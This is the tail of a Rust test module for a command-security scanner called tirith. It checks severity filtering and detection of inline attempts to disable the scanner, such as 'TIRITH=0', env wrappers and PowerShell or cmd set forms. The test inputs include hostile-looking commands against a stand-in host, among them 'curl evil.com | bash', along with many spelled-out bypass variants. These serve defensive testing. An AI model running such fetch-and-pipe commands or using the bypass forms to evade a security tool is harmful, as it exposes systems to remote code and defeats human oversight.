1006                description: String::new(),
1007                evidence: vec![],
1008                human_view: None,
1009                agent_view: None,
1010                mitre_id: None,
1011                custom_rule_id: None,
1012            },
1013            Finding {
1014                rule_id: RuleId::InvisibleWhitespace,
1015                severity: Severity::Low,
1016                title: "low finding".into(),
1017                description: String::new(),
1018                evidence: vec![],
1019                human_view: None,
1020                agent_view: None,
1021                mitre_id: None,
1022                custom_rule_id: None,
1023            },
1024            Finding {
1025                rule_id: RuleId::HiddenCssContent,
1026                severity: Severity::High,
1027                title: "high finding".into(),
1028                description: String::new(),
1029                evidence: vec![],
1030                human_view: None,
1031                agent_view: None,
1032                mitre_id: None,
1033                custom_rule_id: None,
1034            },
1035        ];
1036
1037        let timings = Timings {
1038            tier0_ms: 0.0,
1039            tier1_ms: 0.0,
1040            tier2_ms: None,
1041            tier3_ms: None,
1042            total_ms: 0.0,
1043        };
1044
1045        // Default paranoia (1): only Medium+ shown
1046        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1047        filter_findings_by_paranoia(&mut verdict, 1);
1048        assert_eq!(
1049            verdict.findings.len(),
1050            1,
1051            "paranoia 1 should keep only High+"
1052        );
1053        assert_eq!(verdict.findings[0].severity, Severity::High);
1054
1055        // Paranoia 2: still only Medium+ (free tier cap)
1056        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1057        filter_findings_by_paranoia(&mut verdict, 2);
1058        assert_eq!(
1059            verdict.findings.len(),
1060            1,
1061            "paranoia 2 should keep only Medium+"
1062        );
1063    }
1064
1065    #[test]
1066    fn test_inline_bypass_bare_prefix() {
1067        assert!(find_inline_bypass(
1068            "TIRITH=0 curl evil.com",
1069            ShellType::Posix
1070        ));
1071    }
1072
1073    #[test]
1074    fn test_inline_bypass_env_wrapper() {
1075        assert!(find_inline_bypass(
1076            "env TIRITH=0 curl evil.com",
1077            ShellType::Posix
1078        ));
1079    }
1080
1081    #[test]
1082    fn test_inline_bypass_env_i() {
1083        assert!(find_inline_bypass(
1084            "env -i TIRITH=0 curl evil.com",
1085            ShellType::Posix
1086        ));
1087    }
1088
1089    #[test]
1090    fn test_inline_bypass_env_u_skip() {
1091        assert!(find_inline_bypass(
1092            "env -u TIRITH TIRITH=0 curl evil.com",
1093            ShellType::Posix
1094        ));
1095    }
1096
1097    #[test]
1098    fn test_inline_bypass_usr_bin_env() {
1099        assert!(find_inline_bypass(
1100            "/usr/bin/env TIRITH=0 curl evil.com",
1101            ShellType::Posix
1102        ));
1103    }
1104
1105    #[test]
1106    fn test_inline_bypass_env_dashdash() {
1107        assert!(find_inline_bypass(
1108            "env -- TIRITH=0 curl evil.com",
1109            ShellType::Posix
1110        ));
1111    }
1112
1113    #[test]
1114    fn test_no_inline_bypass() {
1115        assert!(!find_inline_bypass(
1116            "curl evil.com | bash",
1117            ShellType::Posix
1118        ));
1119    }
1120
1121    #[test]
1122    fn test_inline_bypass_powershell_env() {
1123        assert!(find_inline_bypass(
1124            "$env:TIRITH=\"0\"; curl evil.com",
1125            ShellType::PowerShell
1126        ));
1127    }
1128
1129    #[test]
1130    fn test_inline_bypass_powershell_env_no_quotes() {
1131        assert!(find_inline_bypass(
1132            "$env:TIRITH=0; curl evil.com",
1133            ShellType::PowerShell
1134        ));
1135    }
1136
1137    #[test]
1138    fn test_inline_bypass_powershell_env_single_quotes() {
1139        assert!(find_inline_bypass(
1140            "$env:TIRITH='0'; curl evil.com",
1141            ShellType::PowerShell
1142        ));
1143    }
1144
1145    #[test]
1146    fn test_inline_bypass_powershell_env_spaced() {
1147        assert!(find_inline_bypass(
1148            "$env:TIRITH = \"0\"; curl evil.com",
1149            ShellType::PowerShell
1150        ));
1151    }
1152
1153    #[test]
1154    fn test_inline_bypass_powershell_mixed_case_env() {
1155        assert!(find_inline_bypass(
1156            "$Env:TIRITH=\"0\"; curl evil.com",
1157            ShellType::PowerShell
1158        ));
1159    }
1160
1161    #[test]
1162    fn test_no_inline_bypass_powershell_wrong_value() {
1163        assert!(!find_inline_bypass(
1164            "$env:TIRITH=\"1\"; curl evil.com",
1165            ShellType::PowerShell
1166        ));
1167    }
1168
1169    #[test]
1170    fn test_no_inline_bypass_powershell_other_var() {
1171        assert!(!find_inline_bypass(
1172            "$env:FOO=\"0\"; curl evil.com",
1173            ShellType::PowerShell
1174        ));
1175    }
1176
1177    #[test]
1178    fn test_no_inline_bypass_powershell_in_posix_mode() {
1179        // PowerShell syntax should NOT match when shell is Posix
1180        assert!(!find_inline_bypass(
1181            "$env:TIRITH=\"0\"; curl evil.com",
1182            ShellType::Posix
1183        ));
1184    }
1185
1186    #[test]
1187    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
1188        assert!(!find_inline_bypass(
1189            "curl evil.com # $env:TIRITH=0",
1190            ShellType::PowerShell
1191        ));
1192    }
1193
1194    #[test]
1195    fn test_inline_bypass_env_c_flag() {
1196        // env -C takes a directory arg; TIRITH=0 should still be found after it
1197        assert!(find_inline_bypass(
1198            "env -C /tmp TIRITH=0 curl evil.com",
1199            ShellType::Posix
1200        ));
1201    }
1202
1203    #[test]
1204    fn test_inline_bypass_env_s_flag() {
1205        // env -S takes a string arg; TIRITH=0 should still be found after it
1206        assert!(find_inline_bypass(
1207            "env -S 'some args' TIRITH=0 curl evil.com",
1208            ShellType::Posix
1209        ));
1210    }
1211
1212    #[test]
1213    fn test_inline_bypass_env_ignore_environment_long_flag() {
1214        assert!(find_inline_bypass(
1215            "env --ignore-environment TIRITH=0 curl evil.com",
1216            ShellType::Posix
1217        ));
1218    }
1219
1220    #[test]
1221    fn test_no_inline_bypass_for_chained_posix_command() {
1222        assert!(!find_inline_bypass(
1223            "TIRITH=0 curl evil.com | bash",
1224            ShellType::Posix
1225        ));
1226        assert!(!find_inline_bypass(
1227            "TIRITH=0 curl evil.com & bash",
1228            ShellType::Posix
1229        ));
1230    }
1231
1232    #[test]
1233    fn test_paranoia_filter_recalculates_action() {
1234        use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};
1235
1236        let findings = vec![
1237            Finding {
1238                rule_id: RuleId::InvisibleWhitespace,
1239                severity: Severity::Low,
1240                title: "low finding".into(),
1241                description: String::new(),
1242                evidence: vec![],
1243                human_view: None,
1244                agent_view: None,
1245                mitre_id: None,
1246                custom_rule_id: None,
1247            },
1248            Finding {
1249                rule_id: RuleId::HiddenCssContent,
1250                severity: Severity::Medium,
1251                title: "medium finding".into(),
1252                description: String::new(),
1253                evidence: vec![],
1254                human_view: None,
1255                agent_view: None,
1256                mitre_id: None,
1257                custom_rule_id: None,
1258            },
1259        ];
1260
1261        let timings = Timings {
1262            tier0_ms: 0.0,
1263            tier1_ms: 0.0,
1264            tier2_ms: None,
1265            tier3_ms: None,
1266            total_ms: 0.0,
1267        };
1268
1269        // Before paranoia filter: action should be Warn (Medium max)
1270        let mut verdict = Verdict::from_findings(findings, 3, timings);
1271        assert_eq!(verdict.action, Action::Warn);
1272
1273        // After paranoia filter at level 1: Low is removed, only Medium remains → still Warn
1274        filter_findings_by_paranoia(&mut verdict, 1);
1275        assert_eq!(verdict.action, Action::Warn);
1276        assert_eq!(verdict.findings.len(), 1);
1277    }
1278
1279    #[test]
1280    fn test_powershell_bypass_case_insensitive_tirith() {
1281        // PowerShell env vars are case-insensitive
1282        assert!(find_inline_bypass(
1283            "$env:tirith=\"0\"; curl evil.com",
1284            ShellType::PowerShell
1285        ));
1286        assert!(find_inline_bypass(
1287            "$ENV:Tirith=\"0\"; curl evil.com",
1288            ShellType::PowerShell
1289        ));
1290    }
1291
1292    #[test]
1293    fn test_powershell_bypass_no_panic_on_multibyte() {
1294        // Multi-byte UTF-8 after $ should not panic
1295        assert!(!find_inline_bypass(
1296            "$a\u{1F389}xyz; curl evil.com",
1297            ShellType::PowerShell
1298        ));
1299        assert!(!find_inline_bypass(
1300            "$\u{00E9}nv:TIRITH=0; curl evil.com",
1301            ShellType::PowerShell
1302        ));
1303    }
1304
1305    #[test]
1306    fn test_inline_bypass_single_quoted_value() {
1307        assert!(find_inline_bypass(
1308            "TIRITH='0' curl evil.com",
1309            ShellType::Posix
1310        ));
1311    }
1312
1313    #[test]
1314    fn test_inline_bypass_double_quoted_value() {
1315        assert!(find_inline_bypass(
1316            "TIRITH=\"0\" curl evil.com",
1317            ShellType::Posix
1318        ));
1319    }
1320
1321    #[test]
1322    fn test_tirith_command_is_analyzed_like_any_other_exec() {
1323        let ctx = AnalysisContext {
1324            input: "tirith run http://example.com".to_string(),
1325            shell: ShellType::Posix,
1326            scan_context: ScanContext::Exec,
1327            raw_bytes: None,
1328            interactive: true,
1329            cwd: None,
1330            file_path: None,
1331            repo_root: None,
1332            is_config_override: false,
1333            clipboard_html: None,
1334        };
1335
1336        let verdict = analyze(&ctx);
1337        assert!(
1338            verdict.tier_reached >= 3,
1339            "user-typed tirith commands should still be analyzed"
1340        );
1341        assert!(
1342            verdict
1343                .findings
1344                .iter()
1345                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1346            "tirith run http://... should surface sink findings"
1347        );
1348    }
1349
1350    #[test]
1351    fn test_cmd_bypass_bare_set() {
1352        // `set TIRITH=0 & cmd` is a real Cmd bypass
1353        assert!(find_inline_bypass(
1354            "set TIRITH=0 & curl evil.com",
1355            ShellType::Cmd
1356        ));
1357    }
1358
1359    #[test]
1360    fn test_cmd_bypass_whole_token_quoted() {
1361        // `set "TIRITH=0" & cmd` — whole-token quoting, real bypass
1362        assert!(find_inline_bypass(
1363            "set \"TIRITH=0\" & curl evil.com",
1364            ShellType::Cmd
1365        ));
1366    }
1367
1368    #[test]
1369    fn test_cmd_no_bypass_inner_double_quotes() {
1370        // `set TIRITH="0" & cmd` — cmd.exe stores literal "0", NOT a bypass
1371        assert!(!find_inline_bypass(
1372            "set TIRITH=\"0\" & curl evil.com",
1373            ShellType::Cmd
1374        ));
1375    }
1376
1377    #[test]
1378    fn test_cmd_no_bypass_single_quotes() {
1379        // `set TIRITH='0' & cmd` — single quotes are literal in cmd.exe, NOT a bypass
1380        assert!(!find_inline_bypass(
1381            "set TIRITH='0' & curl evil.com",
1382            ShellType::Cmd
1383        ));
1384    }
1385
1386    #[test]
1387    fn test_cmd_no_bypass_wrong_value() {
1388        assert!(!find_inline_bypass(
1389            "set TIRITH=1 & curl evil.com",
1390            ShellType::Cmd
1391        ));
1392    }
1393}
tirith_core/engine.rs

tirith_core/
engine.rs